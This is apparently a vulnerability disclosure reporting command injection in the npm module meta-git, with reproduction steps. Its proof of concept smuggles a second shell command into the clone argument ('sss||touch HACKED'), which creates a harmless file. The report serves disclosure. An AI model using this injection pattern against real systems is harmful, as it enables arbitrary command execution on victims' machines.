Code Injection in mateodelnorte/meta-git


Reported on

Nov 2nd 2019


The meta-git module is vulnerable against command injection since the user-supplied inputs are concatenated with a command which is executed without validation.


  1. Create a new directory and insert some test files:
mkdir tests
cd tests
touch test
touch secret
touch files
  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
npm i meta-git -g # Install affected module
meta-git clone 'sss||touch HACKED' # *HACKED* file is created
  1. Recheck the files: now HACKED has been created
to join this conversation